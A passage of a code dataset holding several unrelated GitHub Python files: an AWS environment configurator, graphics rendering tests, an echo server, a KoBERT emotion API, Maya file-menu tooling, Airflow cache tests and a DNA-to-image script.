+{"seq_id":"59761842","text":"from pathlib import Path\n\nfrom fleet.configs import drive_config as cfg\nfrom fleet.configs.drive_config import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass Configure:\n\n def __init__(self):\n\n self.environment_name = None\n\n def build_parser(self, parser):\n\n subparsers = parser.add_subparsers(title='Environment configuration',\n dest='op',\n description='Valid Environment config'\n ' operation', help='Select a '\n 'command to run')\n\n # data-catalogue env {get, set}\n # where {get, set} is required\n\n subparsers.required = True\n\n set = subparsers.add_parser('set', help='Set environment info')\n get = subparsers.add_parser('get', help='Get environment info')\n\n set.set_defaults(main=self.set_environ)\n get.set_defaults(main=self.get_environ)\n\n set.add_argument(help='Environment configuration', dest='env',\n choices=['default', 'develop', 'staging', 'testing'])\n\n def set_environ(self, args):\n\n self.environment_name = args.env\n\n assert self.environment_name in cfg.AWS_PROFILE_NAMES\n profile_name = cfg.AWS_PROFILE_NAMES[self.environment_name]\n credentials_file = cfg.AWS_CREDENTIALS_FILE\n credentials_file = Path(credentials_file)\n\n if credentials_file.is_file():\n credentials_file.unlink()\n\n credentials_file.parent.mkdir(parents=True, exist_ok=True)\n\n with credentials_file.open('w') as fp:\n fp.write('{}\\n'.format(self.environment_name))\n fp.write('{}\\n'.format(profile_name))\n\n logger.info('{} environment setup'.format(self.environment_name))\n\n def get_environ(self, args):\n\n if not Path(cfg.AWS_CREDENTIALS_FILE).is_file():\n 
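# A minimal sketch, not part of the Euler 066 record above, of the standard
# continued-fraction recurrence that record's converg() implements: expand
# sqrt(D) as [a0; a1, a2, ...] and walk the convergents h/k until
# h*h - D*k*k == 1. The helper name pell_minimal_x is illustrative.
import math

def pell_minimal_x(D):
    # assumes D is a positive non-square integer (Python 3.8+ for isqrt)
    a0 = math.isqrt(D)
    m, d, a = 0, 1, a0
    h_prev, h = 1, a0      # convergent numerators h_{k-1}, h_k
    k_prev, k = 0, 1       # convergent denominators
    while h * h - D * k * k != 1:
        m = d * a - m
        d = (D - m * m) // d
        a = (a0 + m) // d
        h, h_prev = a * h + h_prev, h
        k, k_prev = a * k + k_prev, k
    return h, k

# pell_minimal_x(13) == (649, 180), matching the D=13 example in the docstring.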
logger.warning('Environment not setup')\n return\n\n with open(cfg.AWS_CREDENTIALS_FILE) as pfile:\n creds = pfile.readlines()\n\n assert len(creds) == 2, \"Credentials file incorrect\"\n env_name, profile_name = [c.strip() for c in creds]\n\n logger.info('Environment name : {}'.format(env_name))\n logger.info('Profile name : {}'.format(profile_name))\n","repo_name":"moabitcoin/data-catalogue","sub_path":"fleet/s3_ops/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35260609533","text":"import textwrap\n\nfrom pynodegl_utils.misc import SceneCfg, scene\nfrom pynodegl_utils.tests.cmp_fingerprint import test_fingerprint\nfrom pynodegl_utils.toolbox.colors import COLORS\nfrom pynodegl_utils.toolbox.shapes import equilateral_triangle_coords\n\nimport pynodegl as ngl\n\n\n@test_fingerprint(width=320, height=320, nb_keyframes=20, tolerance=1)\n@scene()\ndef velocity_triangle_rotate(cfg: SceneCfg):\n cfg.duration = 5.0\n cfg.aspect_ratio = (1, 1)\n\n anim_kf = [\n ngl.AnimKeyFrameFloat(0, 0),\n ngl.AnimKeyFrameFloat(cfg.duration, 360 * 3, \"circular_in_out\"),\n ]\n anim = ngl.AnimatedFloat(anim_kf)\n velocity = ngl.VelocityFloat(anim)\n\n frag = textwrap.dedent(\n \"\"\"\\\n void main()\n {\n float v = clamp(velocity / 3000., 0.0, 1.0);\n ngl_out_color = vec4(v, v / 2.0, 0.0, 1.0);\n }\n \"\"\"\n )\n\n p0, p1, p2 = equilateral_triangle_coords(2.0)\n triangle = ngl.RenderColor(COLORS.white, geometry=ngl.Triangle(p0, p1, p2))\n triangle = ngl.Rotate(triangle, angle=anim)\n\n prog_c = ngl.Program(vertex=cfg.get_vert(\"color\"), fragment=frag)\n circle = ngl.Render(ngl.Circle(radius=1.0, npoints=128), prog_c)\n circle.update_frag_resources(velocity=velocity)\n return ngl.Group(children=(circle, triangle))\n\n\n@test_fingerprint(width=320, height=320, nb_keyframes=20, tolerance=1)\n@scene()\ndef velocity_circle_distort_2d(cfg: SceneCfg):\n cfg.duration = 4.0\n cfg.aspect_ratio = (1, 1)\n\n coords = list(equilateral_triangle_coords())\n coords.append(coords[0])\n\n pos_kf = [ngl.AnimKeyFrameVec2(cfg.duration * i / 3.0, pos[0:2], \"exp_in_out\") for i, pos in enumerate(coords)]\n anim = ngl.AnimatedVec2(pos_kf)\n velocity = ngl.VelocityVec2(anim)\n\n vert = textwrap.dedent(\n \"\"\"\\\n void main()\n {\n float distort_max = 0.1;\n float velocity_l = length(velocity);\n float direction_l = length(ngl_position);\n vec2 normed_velocity = velocity_l == 0.0 ? vec2(0.0) : -velocity / velocity_l;\n vec2 normed_direction = direction_l == 0.0 ? 
vec2(0.0) : ngl_position.xy / direction_l;\n float distort = clamp(dot(normed_velocity, normed_direction) / 2.0 * distort_max, 0.0, 1.0);\n vec4 pos = vec4(ngl_position, 1.0) + vec4(translate, 0.0, 0.0) + vec4(-distort * velocity, 0.0, 0.0);\n ngl_out_pos = ngl_projection_matrix * ngl_modelview_matrix * pos;\n }\n \"\"\"\n )\n\n geom = ngl.Circle(radius=0.2, npoints=128)\n prog = ngl.Program(vertex=vert, fragment=cfg.get_frag(\"color\"))\n shape = ngl.Render(geom, prog)\n shape.update_frag_resources(color=ngl.UniformVec3(COLORS.white), opacity=ngl.UniformFloat(1))\n shape.update_vert_resources(velocity=velocity, translate=anim)\n return shape\n\n\n@test_fingerprint(width=320, height=320, nb_keyframes=20, tolerance=1)\n@scene()\ndef velocity_circle_distort_3d(cfg: SceneCfg):\n cfg.duration = 4.0\n cfg.aspect_ratio = (1, 1)\n\n coords = list(equilateral_triangle_coords())\n coords.append(coords[0])\n pos_kf = [ngl.AnimKeyFrameVec3(cfg.duration * i / 3.0, pos, \"exp_in_out\") for i, pos in enumerate(coords)]\n anim = ngl.AnimatedVec3(pos_kf)\n velocity = ngl.VelocityVec3(anim)\n\n vert = textwrap.dedent(\n \"\"\"\\\n void main()\n {\n float distort_max = 0.1;\n float velocity_l = length(velocity);\n float direction_l = length(ngl_position);\n vec3 normed_velocity = velocity_l == 0.0 ? vec3(0.0) : -velocity / velocity_l;\n vec3 normed_direction = direction_l == 0.0 ? vec3(0.0) : ngl_position / direction_l;\n float distort = clamp(dot(normed_velocity, normed_direction) / 2.0 * distort_max, 0.0, 1.0);\n vec4 pos = vec4(ngl_position, 1.0) + vec4(-distort * velocity, 0.0);\n ngl_out_pos = ngl_projection_matrix * ngl_modelview_matrix * pos;\n }\n \"\"\"\n )\n\n geom = ngl.Circle(radius=0.2, npoints=128)\n prog = ngl.Program(vertex=vert, fragment=cfg.get_frag(\"color\"))\n shape = ngl.Render(geom, prog)\n shape.update_frag_resources(color=ngl.UniformVec3(COLORS.white), opacity=ngl.UniformFloat(1))\n shape.update_vert_resources(velocity=velocity)\n return ngl.Translate(shape, vector=anim)\n","repo_name":"gopro/gopro-lib-node.gl","sub_path":"tests/velocity.py","file_name":"velocity.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"35"} +{"seq_id":"73642558180","text":"import socket\n\ndef send_msg(sock, msg):\n totalsl = 0\n totalml = len(msg)\n while totalsl < totalml:\n sl = sock.send(msg[totalsl:])\n if sl == 0:\n raise RuntimeError('socket connection broken')\n totalsl += sl\n\ndef recv_msg(sock, cl=1024):\n while True:\n rc = sock.recv(cl)\n if len(rc) == 0:\n break\n yield rc\n\ndef main(ip, port):\n\n ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,True)\n ss.bind((ip, port))\n ss.listen()\n print('starting server ...')\n cs, (ca, cp) = ss.accept()\n print(f'accepted from {ca}:{cp}')\n for rm in recv_msg(cs):\n send_msg(cs, rm)\n print(f'echo: {rm}')\n cs.close()\n ss.close()\n\nif __name__ == '__main__':\n ip, port = input().split(':')\n main(ip, int(port))\n","repo_name":"itc-n23026/SocketProgramming","sub_path":"server/echoserver.py","file_name":"echoserver.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8503284480","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nimport gluonnlp as nlp\nimport numpy as np\nimport kss\nfrom tqdm 
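# The echoserver.py record above implements only the server side of the echo
# protocol; this is a minimal client sketch to exercise it. The host/port
# values are illustrative, not taken from the original file.
import socket

def echo_once(host, port, payload=b'hello'):
    with socket.create_connection((host, port)) as cs:
        cs.sendall(payload)        # sendall() loops like send_msg() above
        return cs.recv(1024)

# e.g. echo_once('127.0.0.1', 9000) should return b'hello' against the server.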
import tqdm, tqdm_notebook\nfrom kobert.utils import get_tokenizer\nfrom kobert.pytorch_kobert import get_pytorch_kobert_model\nfrom transformers import AdamW\nfrom transformers.optimization import get_cosine_schedule_with_warmup\nfrom bert_model import BERTClassifier\nfrom bertDataSet import BERTDataset\n\n\nfrom typing import Optional\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\napp = FastAPI()\n\n\nclass Item(BaseModel):\n writing: str\n\n\n@app.get('/')\ndef read_root():\n return{\"Hello\": \"World\"}\n\n\n@app.post('/emotion')\ndef emotion_extraction(item: Item):\n max_len = 64\n batch_size = 64\n warmup_ratio = 0.1\n num_epochs = 20\n max_grad_norm = 1\n log_interval = 200\n learning_rate = 5e-5\n device = torch.device('cpu')\n bertmodel, vocab = get_pytorch_kobert_model()\n # 토큰화\n tokenizer = get_tokenizer()\n tok = nlp.data.BERTSPTokenizer(tokenizer, vocab, lower=False)\n\n model = BERTClassifier(bertmodel, dr_rate=0.5).to(device)\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(\n nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in model.named_parameters() if any(\n nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n\n optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n # 전체 모델을 통째로 불러옴, 클래스 선언 필수\n # model = torch.load('../../model/3emotions_model2.pt', map_location=device)\n # state_dict를 불러 온 후, 모델에 저장\n model.load_state_dict(torch.load(\n '../mlptkey/3emotions_model_state_dict2.pt', map_location=device))\n\n checkpoint = torch.load('../mlptkey/3emotions_all2.tar',\n map_location=device) # dict 불러오기\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n # dataset_another = [['영화에 나오는 귀신이 너무 무섭네요', '0'], ['그게 사실이야? 
대박', '0'], ['배고파서 화가 난다', '0'],\n # ['그런 일이 있었다니 참 안타깝다', '0'], ['오늘은 비가 온다고 해요~', '0'], ['대학교에 붙어서 기분이 너무 좋다', '0'], ['수준 너무 떨어진다~', '0']]\n\n total = []\n item = str(item)\n for sent in kss.split_sentences(item): # 글에서 문장 하나씩 가져오기\n sentence = []\n sentence.append(sent)\n sentence.append('0')\n total.append(sentence)\n\n another_test = BERTDataset(\n total, 0, 1, tok, max_len, True, False)\n test_dataloader = torch.utils.data.DataLoader(\n another_test, batch_size=batch_size, num_workers=5)\n\n model.eval()\n result = -1\n for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(tqdm_notebook(test_dataloader)):\n token_ids = token_ids.long().to(device)\n segment_ids = segment_ids.long().to(device)\n\n valid_length = valid_length\n label = label.long().to(device)\n\n out = model(token_ids, valid_length, segment_ids)\n\n test_eval = []\n for i in out:\n logits = i\n logits = logits.detach().cpu().numpy()\n test_eval.append(np.argmax(logits))\n\n print(test_eval)\n print(max(test_eval, key=test_eval.count))\n result = int(max(test_eval, key=test_eval.count))\n\n return result\n","repo_name":"hoonbro/Greeder","sub_path":"emotion/emotion_extraction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74077292899","text":"# !/usr/bin/python\n# coding=utf-8\nimport os\n\ntry:\n import pymel.core as pm\nexcept ImportError as error:\n print(__file__, error)\nimport pythontk as ptk\nimport mayatk as mtk\nfrom uitk import Signals\nfrom tentacle.slots.maya import SlotsMaya\n\n\nclass File(SlotsMaya):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def cmb001_init(self, widget):\n \"\"\" \"\"\"\n widget.refresh = True\n\n widget.add(\n mtk.get_recent_projects(slice(0, 20), format=\"timestamp|standard\"),\n header=\"Recent Projects:\",\n clear=True,\n )\n\n def cmb001(self, index, widget):\n \"\"\"Recent Projects\"\"\"\n if index > 0:\n project = widget.items[index]\n pm.workspace.open(project)\n widget.setCurrentIndex(0)\n self.sb.file.cmb006.init_slot()\n\n def cmb002_init(self, widget):\n \"\"\" \"\"\"\n # Get the current autosave state\n autoSaveState = pm.autoSave(q=True, enable=True)\n autoSaveInterval = pm.autoSave(q=True, int=True)\n autoSaveAmount = pm.autoSave(q=True, maxBackups=True)\n # open directory\n widget.menu.add(\n \"QPushButton\",\n setObjectName=\"b000\",\n setText=\"Open Directory\",\n setToolTip=\"Open the autosave directory.\",\n )\n # delete all\n widget.menu.add(\n \"QPushButton\",\n setObjectName=\"b002\",\n setText=\"Delete All\",\n setToolTip=\"Delete all autosave files.\",\n )\n # toggle autosave\n widget.menu.add(\n \"QCheckBox\",\n setText=\"Autosave\",\n setObjectName=\"chk006\",\n setChecked=autoSaveState,\n setToolTip=\"Set the autosave state as active or disabled.\",\n )\n # autosave amount\n widget.menu.add(\n \"QSpinBox\",\n setPrefix=\"Amount: \",\n setObjectName=\"s000\",\n set_limits=[1, 100],\n setValue=autoSaveAmount,\n set_height=20,\n setToolTip=\"The number of autosave files to retain.\",\n )\n # autosave interval\n widget.menu.add(\n \"QSpinBox\",\n setPrefix=\"Interval: \",\n setObjectName=\"s001\",\n set_limits=[1, 60],\n setValue=autoSaveInterval / 60,\n set_height=20,\n setToolTip=\"The autosave interval in minutes.\",\n )\n widget.menu.chk006.toggled.connect(\n lambda s: pm.autoSave(enable=s, limitBackups=True)\n )\n widget.menu.s000.valueChanged.connect(\n lambda v: 
pm.autoSave(maxBackups=v, limitBackups=True)\n )\n widget.menu.s001.valueChanged.connect(\n lambda v: pm.autoSave(int=v * 60, limitBackups=True)\n )\n widget.add(\n mtk.get_recent_autosave(format=\"timestamp|standard\"),\n header=\"Recent Autosave\",\n clear=True,\n )\n\n def cmb002(self, index, widget):\n \"\"\"Recent Autosave\"\"\"\n if index > 0:\n file = widget.items[index]\n pm.openFile(file, open=1, force=True)\n widget.setCurrentIndex(0)\n\n def cmb003_init(self, widget):\n \"\"\" \"\"\"\n widget.add(\n [\n \"Import file\",\n \"Import Options\",\n \"FBX Import Presets\",\n \"Obj Import Presets\",\n ],\n header=\"Import\",\n )\n\n def cmb003(self, index, widget):\n \"\"\"Import\"\"\"\n if index > 0: # hide then perform operation\n self.sb.parent().hide(force=1)\n if index == 1: # Import\n pm.mel.Import()\n elif index == 2: # Import options\n pm.mel.ImportOptions()\n elif index == 3: # FBX Import Presets\n pm.mel.FBXUICallBack(-1, \"editImportPresetInNewWindow\", \"fbx\")\n elif index == 4: # Obj Import Presets\n pm.mel.FBXUICallBack(-1, \"editImportPresetInNewWindow\", \"obj\")\n widget.setCurrentIndex(0)\n\n def cmb004_init(self, widget):\n \"\"\" \"\"\"\n items = [\n \"Export Selection\",\n \"Send to Unreal\",\n \"Send to Unity\",\n \"GoZ\",\n \"Send to 3dsMax: As New Scene\",\n \"Send to 3dsMax: Update Current\",\n \"Send to 3dsMax: Add to Current\",\n \"Export to Offline File\",\n \"Export Options\",\n \"FBX Export Presets\",\n \"Obj Export Presets\",\n ]\n widget.add(items, header=\"Export\")\n\n def cmb004(self, index, widget):\n \"\"\"Export\"\"\"\n if index > 0: # hide then perform operation\n self.sb.parent().hide(force=1)\n if index == 1: # Export selection\n pm.mel.ExportSelection()\n elif index == 2: # Unreal\n pm.mel.SendToUnrealSelection()\n elif index == 3: # Unity\n pm.mel.SendToUnitySelection()\n elif index == 4: # GoZ\n pm.mel.eval(\n 'print(\"GoZ\"); source\"C:/Users/Public/Pixologic/GoZApps/Maya/GoZBrushFromMaya.mel\"; source \"C:/Users/Public/Pixologic/GoZApps/Maya/GoZScript.mel\";'\n )\n elif index == 5: # Send to 3dsMax: As New Scene\n pm.mel.SendAsNewScene3dsMax() # OneClickMenuExecute (\"3ds Max\", \"SendAsNewScene\"); doMaxFlow { \"sendNew\",\"perspShape\",\"1\" };\n elif index == 6: # Send to 3dsMax: Update Current\n pm.mel.UpdateCurrentScene3dsMax() # OneClickMenuExecute (\"3ds Max\", \"UpdateCurrentScene\"); doMaxFlow { \"update\",\"perspShape\",\"1\" };\n elif index == 7: # Send to 3dsMax: Add to Current\n pm.mel.AddToCurrentScene3dsMax() # OneClickMenuExecute (\"3ds Max\", \"AddToScene\"); doMaxFlow { \"add\",\"perspShape\",\"1\" };\n elif index == 8: # Export to Offline File\n pm.mel.ExportOfflineFileOptions() # ExportOfflineFile\n elif index == 9: # Export options\n pm.mel.ExportSelectionOptions()\n elif index == 10: # FBX Export Presets\n pm.mel.FBXUICallBack(-1, \"editExportPresetInNewWindow\", \"fbx\")\n elif index == 11: # Obj Export Presets\n pm.mel.FBXUICallBack(-1, \"editExportPresetInNewWindow\", \"obj\")\n widget.setCurrentIndex(0)\n\n def cmb005_init(self, widget):\n \"\"\" \"\"\"\n widget.menu.add(\n \"QPushButton\",\n setObjectName=\"b001\",\n setText=\"Last\",\n setToolTip=\"Open the most recent file.\",\n )\n widget.add(\n mtk.get_recent_files(slice(0, 20), format=\"timestamp|standard\"),\n header=\"Recent Files\",\n clear=True,\n )\n\n def cmb005(self, index, widget):\n \"\"\"Recent Files\"\"\"\n if index > 0:\n force = True\n # if sceneName prompt user to save; else force open\n force if str(pm.mel.file(q=True, sceneName=1, 
shortName=1)) else not force\n print(widget.items[index])\n pm.openFile(widget.items[index], open=1, force=force)\n widget.setCurrentIndex(0)\n\n def cmb006_init(self, widget):\n \"\"\" \"\"\"\n widget.refresh = True\n if not widget.is_initialized:\n widget.menu.add(\n self.sb.Label,\n setObjectName=\"lbl000\",\n setText=\"Set\",\n setToolTip=\"Set the project directory.\",\n )\n widget.menu.add(\n self.sb.Label,\n setObjectName=\"lbl004\",\n setText=\"Root\",\n setToolTip=\"Open the project directory.\",\n )\n\n workspace = mtk.get_maya_info(\"workspace_dir\")\n project = ptk.format_path(workspace, \"dir\")\n # Add each dir in the workspace as well as its full path as data\n items = {d: f\"{workspace}/{d}\" for d in os.listdir(workspace)}\n widget.add(items, header=project, clear=True)\n\n def cmb006(self, index, widget):\n \"\"\"Workspace\"\"\"\n if index > 0:\n try:\n item = widget.items[index]\n os.startfile(item)\n except Exception as e:\n print(e)\n widget.setCurrentIndex(0)\n\n def list000_init(self, widget):\n \"\"\" \"\"\"\n widget.position = \"top\"\n widget.sublist_y_offset = 18\n widget.fixed_item_height = 18\n recentFiles = mtk.get_recent_files(slice(0, 11))\n w1 = widget.add(\"Recent Files\")\n truncated = ptk.truncate(recentFiles, 65)\n w1.sublist.add(zip(truncated, recentFiles))\n widget.setVisible(bool(recentFiles))\n\n @Signals(\"on_item_interacted\")\n def list000(self, item):\n \"\"\" \"\"\"\n data = item.item_data()\n pm.openFile(data, open=True, force=True)\n\n def lbl000(self):\n \"\"\"Set Workspace\"\"\"\n pm.mel.SetProject()\n # refresh project items to reflect new workspace.\n self.sb.file.cmb006.init_slot()\n\n def lbl004(self):\n \"\"\"Open current project root\"\"\"\n dir_ = pm.workspace(q=True, rd=1) # current project path.\n os.startfile(ptk.format_path(dir_))\n\n def b000(self):\n \"\"\"Autosave: Open Directory\"\"\"\n # dir1 = str(pm.workspace(q=True, rd=1))+'autosave' #current project path.\n # get autosave dir path from env variable.\n dir2 = os.environ.get(\"MAYA_AUTOSAVE_FOLDER\").split(\";\")[0]\n\n try:\n # os.startfile(self.format_path(dir1))\n os.startfile(ptk.format_path(dir2))\n\n except FileNotFoundError:\n self.sb.message_box(\"The system cannot find the file specified.\")\n\n def b001(self):\n \"\"\"Open Reference Manager\"\"\"\n module = mtk.core_utils.reference_manager\n slot_class = module.ReferenceManagerSlots\n\n self.sb.register(\"reference_manager.ui\", slot_class, base_dir=module)\n self.sb.parent().set_ui(\"reference_manager\")\n\n def b002(self):\n \"\"\"Autosave: Delete All\"\"\"\n files = mtk.get_recent_autosave()\n for file in files:\n try:\n os.remove(file)\n\n except Exception as error:\n print(error)\n\n @SlotsMaya.hide_main\n def b007(self):\n \"\"\"Import file\"\"\"\n self.sb.file.cmb003.call_slot(1)\n\n @SlotsMaya.hide_main\n def b008(self):\n \"\"\"Export Selection\"\"\"\n self.sb.file.cmb004.call_slot(1)\n\n def b015(self):\n \"\"\"Remove String From Object Names.\"\"\"\n # asterisk denotes startswith*, *endswith, *contains*\n from_ = str(self.sb.file.t000.text())\n to = str(self.sb.file.t001.text())\n replace = self.sb.file.chk004.isChecked()\n selected = self.sb.file.chk005.isChecked()\n\n objects = pm.ls(from_) # Stores a list of all objects starting with 'from_'\n if selected: # get user selected objects instead\n objects = pm.ls(sl=True)\n from_ = from_.strip(\"*\") # strip modifier asterisk from user input\n\n for obj in objects: # Get a list of it's direct parent\n relatives = pm.listRelatives(obj, parent=1)\n # If 
that parent starts with group, it came in root level and is pasted in a group, so ungroup it\n if \"group*\" in relatives:\n relatives[0].ungroup()\n\n newName = to\n if replace:\n newName = obj.replace(from_, to)\n pm.rename(obj, newName) # Rename the object with the new name\n\n\n# --------------------------------------------------------------------------------------------\n\n# module name\n# print(__name__)\n# --------------------------------------------------------------------------------------------\n# Notes\n# --------------------------------------------------------------------------------------------\n","repo_name":"m3trik/tentacle","sub_path":"tentacle/slots/maya/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":11843,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"35"} +{"seq_id":"32675336613","text":"from __future__ import annotations\n\nfrom pathlib import Path\nfrom unittest import mock\n\nimport pytest\n\nfrom airflow_breeze.utils.cache import (\n check_if_cache_exists,\n check_if_values_allowed,\n delete_cache,\n read_from_cache_file,\n)\n\nAIRFLOW_SOURCES = Path(__file__).parents[3].resolve()\n\n\n@pytest.mark.parametrize(\n \"parameter, value, result, exception\",\n [\n (\"backend\", \"mysql\", (True, [\"sqlite\", \"mysql\", \"postgres\", \"mssql\"]), None),\n (\"backend\", \"xxx\", (False, [\"sqlite\", \"mysql\", \"postgres\", \"mssql\"]), None),\n (\"python_major_minor_version\", \"3.8\", (True, [\"3.8\", \"3.9\", \"3.10\", \"3.11\"]), None),\n (\"python_major_minor_version\", \"3.7\", (False, [\"3.8\", \"3.9\", \"3.10\", \"3.11\"]), None),\n (\"missing\", \"value\", None, AttributeError),\n ],\n)\ndef test_allowed_values(parameter, value, result, exception):\n if exception:\n with pytest.raises(expected_exception=exception):\n check_if_values_allowed(parameter, value)\n else:\n assert result == check_if_values_allowed(parameter, value)\n\n\n@mock.patch(\"airflow_breeze.utils.cache.Path\")\ndef test_check_if_cache_exists(path):\n check_if_cache_exists(\"test_param\")\n path.assert_called_once_with(AIRFLOW_SOURCES / \".build\")\n\n\n@pytest.mark.parametrize(\n \"param\",\n [\n \"test_param\",\n \"mysql_version\",\n \"executor\",\n ],\n)\ndef test_read_from_cache_file(param):\n param_value = read_from_cache_file(param.upper())\n if param_value is None:\n assert None is param_value\n else:\n allowed, param_list = check_if_values_allowed(param, param_value)\n if allowed:\n assert param_value in param_list\n\n\n@mock.patch(\"airflow_breeze.utils.cache.Path\")\n@mock.patch(\"airflow_breeze.utils.cache.check_if_cache_exists\")\ndef test_delete_cache_exists(mock_check_if_cache_exists, mock_path):\n param = \"MYSQL_VERSION\"\n mock_check_if_cache_exists.return_value = True\n cache_deleted = delete_cache(param)\n mock_path.assert_called_with(AIRFLOW_SOURCES / \".build\")\n assert cache_deleted\n\n\n@mock.patch(\"airflow_breeze.utils.cache.Path\")\n@mock.patch(\"airflow_breeze.utils.cache.check_if_cache_exists\")\ndef test_delete_cache_not_exists(mock_check_if_cache_exists, mock_path):\n param = \"TEST_PARAM\"\n mock_check_if_cache_exists.return_value = False\n cache_deleted = delete_cache(param)\n assert not cache_deleted\n","repo_name":"a0x8o/airflow","sub_path":"dev/breeze/tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"4758933481","text":"# Creates an image from a 
genetic sequence.\n# Capital letters are the same value as their lowercase counterparts.\n# Thymine (T) and Uracil (U) are treated the same.\n\n# Cole Lightfoot - 30th March 2021\n\nimport sys\nimport math\nimport os.path\nimport argparse\nimport subprocess\nimport ctypes as c\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageColor\nimport multiprocessing as mp\n\n# Command line arguments.\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\n \"--file\",\n type=str,\n default=None,\n help='Directory of images you want to use. This should be a single level directory.',\n)\nparser.add_argument(\n \"--scale\",\n type=int,\n default=1,\n help=\"How much to multiply the scale of the image by. 1 = 1px per base, 2=4px, 4=8px, etc...\",\n)\nparser.add_argument(\n \"--threads\",\n type=int,\n default=mp.cpu_count(),\n help=\"Number of threads to use. Automatically uses as many as your cpu has.\",\n)\nparser.add_argument(\n \"--A\",\n type=str,\n default=None,\n help='Hex colour to use for Adenine',\n)\nparser.add_argument(\n \"--T\",\n type=str,\n default=None,\n help='Hex colour to use for Thymine',\n)\nparser.add_argument(\n \"--C\",\n type=str,\n default=None,\n help='Hex colour to use for Cytosine',\n)\nparser.add_argument(\n \"--G\",\n type=str,\n default=None,\n help='Hex colour to use for Guanine',\n)\nparser.add_argument('--no_optimize', action=\"store_true\", help='Do not compress and optimize the final png, this will save time and RAM.')\nargs = parser.parse_args()\n\n# Catch possible issues with arguments\nif(args.scale <= 0):\n raise ValueError(\"Scale multiplier cannot be 0 or less.\")\nif(args.threads < 1):\n raise ValueError(\"Invalid number of threads. Must be greater than zero.\")\nif(args.threads > mp.cpu_count()):\n if(input(\"\\nWarning, you are going to use \" + str(args.threads) + \" threads. Your CPU has \" + str(mp.cpu_count()) + \" threads.\\nThis may cause lower performance than if you used \" + str(mp.cpu_count()) + \" threads.\\nDo you want to continue? (y/N): \").lower() != \"y\"):\n exit()\n\n# Finds the smallest sized square which can fit all the basepairs\ndef findSquareSize(gene):\n dim = math.sqrt(len(gene))\n # If length of sequence is not a perfect square, add 1. Image will have blank spots at end.\n if(dim%1 != 0):\n dim += 1\n return int(dim)\n\n# Get the input sequence, we need to switch the terminal mode to allow\n# inputs greater than 4095 bases. We get the sequence and switch it back.\ndef getGeneFromCLI():\n subprocess.check_call([\"stty\",\"-icanon\"]) # Comment me if input errors happen.\n inputStr = input(\"Input the sequence: \")\n subprocess.check_call([\"stty\",\"icanon\"]) # Comment me if input errors happen.\n return inputStr\n\n# Get the contents of a file and remove newline characters, then return as a string.\ndef getGeneFromFile(f):\n try:\n with open(f, 'r') as file:\n return file.read().replace('\\n', '')\n except:\n raise FileNotFoundError(\"Could not find / open the file.\", f)\n\n# Convert a hex value into a RGB value. Used for custom colours.\ndef hex2RGB(colour):\n # Check if user did not add \"#\" to start, add it if not.\n if(colour[0] != \"#\"):\n colour = \"#\" + colour\n if(len(colour) != 7):\n raise ValueError(colour + \" Is not a valid hex code for a colour. 
Incorrect number of characters.\")\n for i in colour:\n if(not(ord(i) > 47 and ord(i) < 58 or ord(i) > 64 and ord(i) < 71 or ord(i) > 97 and ord(i) < 103 or ord(i) == 35)):\n raise ValueError(colour + \" Is not a valid hex code for a colour. Invalid character: \" + str(i))\n return ImageColor.getcolor(colour, \"RGB\")\n\n# Save the image and apply scaling\ndef saveImg(array, dim):\n # Generate the image.\n out = Image.fromarray(array, mode=\"RGB\")\n\n # Scale up the image\n if(args.scale != 1):\n out = out.resize((dim*args.scale, dim*args.scale), resample=Image.NEAREST)\n\n # Save the image, do not overwrite any previous images.\n path = os.getcwd()\n fileName = \"GenePic\"\n ext = \".png\"\n if(os.path.isfile(os.path.join(path, fileName + ext))):\n num = 2\n while(os.path.isfile(os.path.join(path, fileName + str(num) + ext))):\n num += 1\n if(not args.no_optimize):\n out.save(os.path.join(path, fileName + str(num) + ext), optimize = True, compress_level = 9)\n else:\n out.save(os.path.join(path, fileName + str(num) + ext))\n print(\"Image with \" + str(len(sequence)) + \" bases saved to \" + os.path.join(path, fileName + str(num) + ext))\n else:\n if(not args.no_optimize):\n out.save(os.path.join(path, fileName + ext), optimize = True, compress_level = 9)\n else:\n out.save(os.path.join(path, fileName + ext))\n print(\"Image with \" + str(len(sequence)) + \" bases saved to \" + os.path.join(path, fileName + ext))\n\n# Associate the bases with their proper colours and places the rgb values into the numpy array.\ndef base2color(lock, mp_arr, mp_arr2, tdone, gene, splits, dim, id):\n # Turn the colours array into a numpy array, but still use the same shared memory between threads.\n arr = np.frombuffer(mp_arr.get_obj(), dtype=np.uint8)\n colours = arr.reshape((dim,dim,3))\n\n # Turn the tmp_colours array into a numpy array, but still use the same shared memory between threads.\n arr2 = 